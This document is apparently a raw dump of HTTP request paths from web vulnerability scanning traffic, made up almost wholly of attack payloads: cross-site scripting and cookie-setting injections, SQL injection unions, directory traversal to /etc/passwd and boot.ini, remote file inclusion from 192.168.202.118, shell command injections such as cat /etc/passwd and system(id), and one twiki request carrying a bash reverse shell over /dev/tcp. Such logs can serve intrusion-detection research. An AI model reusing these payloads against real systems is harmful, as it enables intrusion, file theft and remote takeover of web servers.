src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/scripts/statsbrowse.asp\n/cgi-bin/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/cacti/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/main.php?stuff=\"|ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/scripts/vzdybnanqpc3.shtml\n/phpmyadmin/supporter/tupdate.php?groupid=change&sg='\n/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/../../../../../../../../../../../../etc/passwd\n/examples/jsp/cal/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/javascript/flash.exe\n/um7xpn15.dll?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/scripts/rtm.log\n/scripts/ui/login?user=nessus-1332010200\n//c:\\system32\\cmd.exe\n/help.php?q=\"uname >q11698793 #\n/scripts/index.php?id='union/**/select/**/0,0,1327215788,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/ap58k3ci.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zmvq66jy.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping,-w,7000,-n,1,4.3.2.1|rem,\n/examples/jsp/num/styles.php?toroot=/etc/passwd\\x00\n/en-us/dda2qr7j.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/preview.php?php_script_path=@rfiurl?cmd=dir&php_script_path=@rfiurl?\n/606wkcop.php3?<script>cross_site_scripting.nasl</script>\n/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini\n/?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/vjbrrppi.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/fm.php\n/examples/servlets/servlet/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/javascript/juniper.exe\n/examples/jsp/jsp2/jspx/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/main.php?stuff=rm;q76531174&rem;\n/en-us/odzk29aa.exe?<script>document.cookie=\"testtfvh=2141;\"</script>\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6279432218.1\n/main.php?stuff=\"rm q49686563 #\n/jw64yq8u.cfm?<script>document.cookie=\"testylfu=1313;\"</script>\n/en-us/w4996nr0.cfm?<script>document.cookie=\"testttvs=7163;\"</script>\n/twiki/bin/view/main/twikiusers?rev=7 `0<&152-;exec 152<>/dev/tcp/192.168.202.118/4971;sh <&152 >&152 2>&152`#\n/scripts/search.jsp?q=%\"<script>alert(1331922091)</script>\n/phpmyadmin//../../../../../../../../windows/win.ini\\x00en\n/starnet/addons/slideshow_full.php?album_name='1619017982\n/en-us/account/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/admin/index.php?path_to_script=http://192.168.202.118:8080/iroy1gvqrrqu??&cmd=ls\n/3j8echh0.nsf?<script>document.cookie=\"testfuqi=4189;\"</script>\n/scripts/oguyjway.exe\n/top.php?stuff=\"ver&rem\\x0b\n/manager/htgrep/file=index.html&hdr=/etc/passwd\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd\n/xsqln7eb.cgi?<script>document.cookie=\"testpcbb=9254;\"</script>\n/ybz5rz7a.do?<script>document.cookie=\"testsbvw=6289;\"</script>\n/examples/jsp/sessions/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/?<script>document.cookie=\"testkwlg=5591;\"</script>\n/forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd\n/u8yiqilu.idc?<script>document.cookie=\"testswjp=6010;\"</script>\n/main.php?logout=&ver\\x09>q39542639&rem\\x09\n/main.php?logout='&rm q16695623 #\n/phpmyadmin/profil.php?id=1 <script>foo</script>\n/examples/jsp/cal/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/o35zot2r.dll?<script>cross_site_scripting.nasl</script>\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/ghl9il?\n/children's-r0/\n/examples/jsp/num/whois.cgi?action=load&whois=;id\n/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il??\n/iktok2bw.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/zmvq66jy.do?<script>cross_site_scripting.nasl</script>\n/cacti/detail.asp?nchannel='1\n<meta http-equiv=set-cookie content=\"testsory=7676\">\n/6n7aacgg.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opendir.php?requesturl=/etc/passwd\n/user/remindpassword?return=\"><script>alert(414506083578)</script><\"\n/ao22ww7y.nsf?<script>document.cookie=\"testqppc=8767;\"</script>\n/scripts/vzdybnanqpc3.cfm\n/phpmyadmin/php.cgi?/etc/passwd\n/ht8pn8uq.jspa?<script>cross_site_scripting.nasl</script>\n/admin/doeditconfig.php?config[path]=@rfiurl&thispath=../includes\n/m2fpztty.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/yfmo7jpwvpv1.cfm\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://cirt.net/rfiinc.txt?\\x00\n/main.php?stuff='&rm q83741819 #\n/user.php?caselist[bad_file.txt][path]=http://192.168.202.118:8080/ghl9il?&command=cat /etc/passwd\n/top.php?stuff=del;q97535751&rem;\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/xlj7h65o.mscgi?<script>document.cookie=\"testtbbe=856;\"</script>\n/include/scripts/send_email_cache.php?dir=http://192.168.202.96:8080/4dckqcc0acprbz?\n/scripts/shoutbox.php?conf=../../../../../../../../etc/passwd\n/manager/index.php?cid='\n/main.php?stuff=\\x0duname\\x09>q47991933\\x09#\n/?<script>document.cookie=\"testcqwz=9752;\"</script>\n/eg2u8pbv.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpinfo.php3?variable=<script>alert('vulnerable')</script>\n/scripts/cevvxrxqxc_b.php\n/top.php?stuff=\"&rm q19468613&rem \n/zv8tv7h8.do?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/rob's_law/\n/bin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/en-us/s7qus4g3.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/formmail.exe\n/xfkun1ku.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/9kr0ih0v.cfm?<script>document.cookie=\"testzgnm=1183;\"</script>\n/benford's_law/\n/azcrfs8d.aspx?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/jsp/checkbox/cvslog.cgi?file=<script>window.alert</script>\n/1qwv2p5p.mscgi?<script>document.cookie=\"testvqcy=252;\"</script>\n/top.php?stuff=2040844887' and 1=1 and ''<>'iocjeefz\n/cgi-915/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/scripts/viewcvs.cgi/?cvsroot=<script>foo</script>\n/actionscriptcode2/\n/cgi/c32web.exe/changeadminpassword\n/uc3w3bdi.kspx?<script>document.cookie=\"testxllt=9940;\"</script>\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331922104\")</script>\n/examples/jsp/jsp2/el/sawmill6cl.exe?ho+{complete_version}\n/cacti/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/examples/jsp/jsp2/el/webplus?script=/../../../../etc/passwd\n/shop/normal_html.cgi?file=../../../../../../etc/issue\\x00\n/javascript/prop-base.exe\n/scripts/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/type.asp?itype='duware_itype_sql_injection.nasl\n/top.php?stuff=\"|ping;-w;7000;-n;1;4.3.2.1|rem;\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=@rfiurl\n/scripts/myaccount/login.asp\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1539349120,0,0,0,0,0--\n/javascript/stores.exe\n/en-us/n9xlumt5.kspx?<script>cross_site_scripting.nasl</script>\n/6wb70v0b.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<20060328210627/\n/5o9zq43e.idc?<script>cross_site_scripting.nasl</script>\n/main.php?logout='rm q29138864 #\n/subscription_submit/\n/examples/jsp/cal/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904434\n/phpmyadmin/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/script/ident/ident.inc.php?path_inc=@rfiurl\n/phpmyadmin/myevent.php?myevent_path=/etc/passwd\\x00\n/cgi-bin/minimal.exe\n/9ko6m4c8.kspx?<script>document.cookie=\"testylik=3403;\"</script>\n/edv3mapy.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/xuicksry9grj.shtml\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331919008\")</script>\n/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd\\x00\n/qb2xy9aw.do?<script>cross_site_scripting.nasl</script>\n/manager/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/index.php?string='\n/qczkquis.cfc?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/init.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??\n/gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/tzhfyzkbomspvm?&cmd=cat/etc/passwd\n/hrttz9fj.nsf?<script>document.cookie=\"testtbjy=7334;\"</script>\n/h4bi26jd.php3?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/examples/jsp/checkbox/a1disp3.cgi?/../../../../../../etc/passwd\n/scripts/1hactwocbsuo.shtml\n/ju0u7kfo.dll?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/ovlaunch.exe\n/examples/jsp/error/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/zv8tv7h8.kspx?<script>document.cookie=\"testcqwz=9752;\"</script>\n/examples/jsp/cal/faq.php?action=&type=view&s=&id=-1' union select 0,717118813,0,0,0,0,0--\n/tukodz3j.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d765w06j.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/vmi8bb12.kspx?<script>document.cookie=\"testlerc=2575;\"</script>\n/subscriptors/\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/javascript/.htpasswd.sfish/\\.sf\\\n/javascript/javascript.exe\n/scripts/u7m5ok8eqpfy.cfm\n/1r8cfrlf.jsp?<script>document.cookie=\"testydan=5106;\"</script>\n/phpmyadmin/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff='\\x0ddel q21221735 #\n/top.php?stuff=\"rm q69198385 #\n/qhvu0pdg.fts?<script>document.cookie=\"testchuc=2100;\"</script>\n/d765w06j.mscgi?<script>cross_site_scripting.nasl</script>\n/dslpwt15.fts?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/examples/jsp/cal/shoutbox.php?conf=../../../../../../../../etc/passwd\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q95122175&frm_user=&scr_height=&scr_width=\n/scripts/logicworks.ini\n/iissamples/sdk/asp/docs/winmsdp.exe?source=/iissamples/\\xc0\\xae\\xc0\\xae/\\xc0\\xae\\xc0\\xae/bogus_directory/nonexistent.asp\n/recordings/doc/index.php?s=/etc/passwd\\x00\n/examples/jsp/checkbox/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/main.php?stuff=\"&ping -w 8000 -n 1 1.2.3.4&rem \n/6wb70v0b.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/?ho+{complete_version}\n/snippetmaster/includes/vars.inc.php?_session[script_path]=@rfiurl\n/gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/ghl9il?&cmd=cat/etc/passwd\n/javascript/htpasswd.orig\n/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/iroy1gvqrrqu??&cmd=ls\n/shell-scripting/\n/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/ghswfouu.cgi?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/xssflash/\n/examples/jsp/sessions/faq.php?action=&type=view&s=&id=-1' union select 0,2063805552,0,0,0,0,0--\n/u8yiqilu.html?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/default.asp?view=archives&month=\"generate_error&year=2004\n/phpmyadmin/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/includes/config.php?relative_script_path=http://xxxxxxx\n/j4rdyhw8.cfc?<script>document.cookie=\"testrluj=1420;\"</script>\n/cacti/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/main.php?stuff=^'\n/prescription-soma/\n/v3axg1p8.fts?<script>document.cookie=\"testxagh=6987;\"</script>\n/h21y8w52.html?<script>cross_site_scripting.nasl</script>\n/script_path/config.inc.php?_path=http://192.168.202.118:8080/zz5thkvtmlgl??\n/shopcustadmin.asp?msg=<script>alert(414515596905)</script>\n/examples/jsp/num/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/manager/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/prescription4love/\n/javascript/unreg.exe\n/help.php?q=';uname >q19585815 #\n/n1afe1y6.aspx?<script>cross_site_scripting.nasl</script>\n/cgi-bin/faqmanager.cgi?toc=/etc/passwd\\x00\n/e9rx3ya4.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/tukodz3j.jsp?<script>cross_site_scripting.nasl</script>\n/scriptcentral/\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919205,1,1,1,1,1,1,1--&blogid=1\n/phpmyadmin/../phpmyadmin.zip\n/main.php?logout=\";sleep\\x098\\x09#\nftp://192.168.23.103/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/l4fz1dqw.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vhzmaia2.jspa?<script>document.cookie=\"testkogj=3979;\"</script>\n/javascript/photo.exe\n/tukodz3j.cfc?<script>cross_site_scripting.nasl</script>\n/cacti/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini\n/y8pmygrp.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/606wkcop.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/sendtemp.pl?templ=../../../../../etc/passwd\n/uvazfs7p.nsf?<script>document.cookie=\"testwtbo=4831;\"</script>\n/en-us/n9xlumt5.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/openwebmail.pl\n/javascript/this.exe\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats186085.txt\n/javascript/match.exe\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../../../etc/passwd\\x00.png\n/i2n4v4rl.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/top.php?header=../../../../../../../../etc/passwd\n/0z575z74.exe?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/examples/jsp/error/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/o6ebbirj.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/drupal.exe\n/sturgeon's_law/\n/javascript/tweak.exe\n/jnv890lt.pl?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=&ver,>q25697841&rem,\n/javascript/permission.exe\n/javascript/htpasswd.test\n/en-us/w4996nr0.cgi?<script>document.cookie=\"testttvs=7163;\"</script>\n/en-us/s7qus4g3.mscgi?<script>cross_site_scripting.nasl</script>\n/cacti/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/iaxsetup.401.exe/\n/?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/webmathematica/msp?mspstoreid=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&mspstoretype=image/gif\n/3j8echh0.cfc?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/ghswfouu.php?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/tukodz3j.html?<script>cross_site_scripting.nasl</script>\n/if69ddo1.asp?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/help.php?q=^'\n/examples/jsp/cal/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/help.php?q=\"rm\\x09q91583756&rem\\x09\n/mpcgi/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/main.php?stuff='sleep 11 #\n/examples/jsp/checkbox/index.php?string='\n/help.php?q=\"|ping,-w,8000,-n,1,1.2.3.4|rem,\n/ydexw8by.fts?<script>document.cookie=\"testulex=4996;\"</script>\n/fc9t54l7.do?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/oie504mr.fts?<script>document.cookie=\"testtpby=7052;\"</script>\n/javascript/managed.exe\n/cgi-bin/whois.cgi?action=load&whois=;id\n/main.php?logout=\"&ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/manager/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/0rufe52p.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bin/cgimail.exe\n/dda2qr7j.asp?<script>cross_site_scripting.nasl</script>\n/cgi-sys/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/main.php?stuff=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,569418189,0,0,0,0,0--\n/top.php?stuff=\";uname >q35544877 #\n/pxagj7n7.do?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/mylog.html?screen=/etc/passwd\n/x7pclv4s.cgi?<script>document.cookie=\"testiulz=3709;\"</script>\n/include/footer.php?t_login=<script>alert(\"xsstest\")</script>\n/examples/jsp/jsp2/jspx/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/tukodz3j.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/i2n4v4rl.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?inc=http://xxxxxx./foo\n/hrttz9fj.aspx?<script>document.cookie=\"testtbjy=7334;\"</script>\n/main.php?stuff=\";del q62299957 #\n/noscript-11/\n/main.php?logout=\"\\x0asleep 8 #\n/e9rx3ya4.dll?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"|ping;-w;11000;-n;1;1.2.3.4|rem;\n/scripts/qcvjnagy16kc.html\n/jnv890lt.idc?<script>cross_site_scripting.nasl</script>\n/h5i6crm3.htm?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/cgi-exe/windmail.exe\n/169okeyj.fts?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/examples/jsp/sessions/showcat.php?cat=1'\n/examples/jsp/error/lang/lang.php?lang_path=/etc/passwd\\x00\n/examples/jsp/error/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/examples/jsp/jsp2/el/directory.php?dir=;cat /etc/passwd\n/\">\\xd0\\xbc\\xd1\\x83\\xd0\\xb7\\xd1\\x8b\\xd0\\xba\\xd0\\xb0</\n/help.php?q=;rm q47158875 #\n/examples/jsp/checkbox/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331923205,1,994516176--\n/5qnlm5z2.cfc?<script>document.cookie=\"testsixi=8451;\"</script>\n/javascript/logoff.exe\n/ydexw8by.php?<script>document.cookie=\"testulex=4996;\"</script>\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.html\n/help.php?q=&rm;q65325882&rem;\n/zv8tv7h8.html?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/script/fckeditor/_whatsnew.html\n/javascript/db_connect.exe\n/examples/jsp/colors/index.php?template=../../../loudblog/custom/config.php\\x00\n/33y9gcqq.pl?<script>document.cookie=\"testnvxc=4301;\"</script>\n/main.php?stuff=&ping;-w;9000;-n;1;4.3.2.1&rem;\n/javascript/format.exe\n/examples/jsp/num/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/aj3pf49c.html?<script>document.cookie=\"testnofv=4170;\"</script>\n/cgi-bin/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/javascript/vb.exe\n/examples/jsp/jsp2/el/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/scripts/c99.php\n/scripts/lom_update.php?etcdir=http://192.168.202.96:8080/4dckqcc0acprbz?\n/xfkun1ku.exe?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/nsn/..\\util/set.bas\n/ows-bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/nyvbv05h.jsp?<script>document.cookie=\"testftxz=5980;\"</script>\n/subscriptions.cnf\n/examples/jsp/jsp2/jspx/index.php?id=0rop9yeuxw'\n/scripts/backofficelite/comersus_backoffice_index.asp\n/w4996nr0.htm?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/examples/servlets/servlet/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/top.php?stuff=\"\\x0ddel\\x09q52865653\\x09#\n/login_up.php3?login_name=x&passwd=x&locale_id=\\..\\common_func.php3\\x00.jpg\n/82q7ywa8.cfc?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/g8nu2yy7.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/ora.exe\n/archive.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz??\n/iv5vkgam.jspa?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/examples/jsp/cal/sgdynamo.exe?htname=<script>foo</script>\n/cgi/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=q52428412&scr_height=&scr_width=\n/interface/login/login_frame.php?site=\"><!--#exec cmd=\"ls /\"--><\n/printsubscription/\n/dda2qr7j.pl?<script>cross_site_scripting.nasl</script>\n/h5sc3gxy.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-exe/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/main.php?stuff='uname >q73795897 #\n/javascript/htpasswd.class\n/cacti/search.pl?form=../../../../../../etc/passwd\\x00\n/smsmacscriptingapplication2/\n/help.php?q=\"rm\\x09q57557316&rem\\x09\n/raanw4ia.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/save.php?file_save=/etc/passwd\n/fmnveedu.cfc?<script>document.cookie=\"testgfbr=7014;\"</script>\n/0qhcnefz.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/en-us/9kr0ih0v.exe?<script>document.cookie=\"testzgnm=1183;\"</script>\n/components/com_mospray/scripts/admin.php?basedir=@rfiurl?basedir=@rfiurl?&cmd=id\n/javascript/temp.exe\n/en-us/33y9gcqq.idc?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/cgi-bin/admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2\n/3j8echh0.kspx?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/examples/jsp/sessions/port.php?proto=tcp'\n/phpmyadmin/index.php?id='union/**/select/**/0,0,1005650116,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/javascript/htpasswd.vbs\n/cgi-bin/al_initialize.php?alpath=/etc/passwd\\x00\n/ows-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/en-us/7o5qp766.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/administrator/index.php\n/examples/jsp/colors/wa.exe?debug-show-version\n/javascript/v1.exe\n/examples/jsp/sessions/home/search.asp?nchannel='1\n/qczkquis.nsf?<script>document.cookie=\"testkwlg=5591;\"</script>\n/help.php?q=\"|ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/cgi-sys/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/javascript/1997.exe\n/en-us/33y9gcqq.aspx?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/books-manuscripts_w0qqlotrz1qqsacategoryz2195qqsocmdzlistingitemlistqqsocolumnlayoutz3qqsocustoverridez1/\n/javascript/examples.exe\n/prescriptions_up/\n/cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini\\x00board=board_1\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1\n/javascript/.passwd.do\n/main.php?logout='\\x0drm\\x09q42114986\\x09#\n/en-us/fo564rei.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/tips.exe\n/j4drbkil.php?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"del;q17781936&rem;\n/u8yiqilu.php?<script>document.cookie=\"testswjp=6010;\"</script>\n/en-us/jnv890lt.aspx?<script>cross_site_scripting.nasl</script>\n/opensourcescripting/\n/manual/images/?c=m;o=a\n/index.php?dir=<script>alert('vulnerable')</script>\n/o6ebbirj.asp?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/index.php?user_langue=../../../../../../../../../../etc/passwd\n/main.php?logout=\"\\x0asleep\\x0911\\x09#\n/main.php?stuff='\\x0dsleep 9 #\n/javascript/procedures.exe\n/?<script>document.cookie=\"testhrzx=1150;\"</script>\n/ghswfouu.php3?<script>document.cookie=\"testsqmm=5713;\"</script>\n/en-us/w4996nr0.fts?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/l752x1ry.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='&uname >q77845858 #\n/main.php?logout=\"&ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/recordings/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/num/viewpage.php?file=/etc/passwd\n/scriptpath/index.php?page=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/script/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp\n/phpmyadmin/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/examples/jsp/error/sawmillcl.exe?ho+{complete_version}\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php&frm_user=&scr_height=&scr_width=q34842846\n/nyvbv05h.x?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/danny_o'brien/\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.cgi\n/main.php?stuff=;rm\\x09q56931967\\x09#\n/en-us/s7qus4g3.dll?<script>cross_site_scripting.nasl</script>\n/i7prbs22.nsf?<script>document.cookie=\"testjnre=7328;\"</script>\n/rbec2ohx.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-home/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/help.php?q=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/l4fz1dqw.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=&ver\\x0b>q91825321&rem\\x0b\n/en-us/account/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/j4oqyvga.fts?<script>cross_site_scripting.nasl</script>\n/egaet53a.exe?<script>cross_site_scripting.nasl</script>\n/miz4r5hz.cfm?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/signup.php?referral=\"><script>alert(\"414415594704\");</script>\n/perl/-e \"system('cat /etc/passwd');\\\"\n/top.php?stuff=\"ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/top.php?stuff=\"|ping -w 10000 -n 1 4.3.2.1|rem 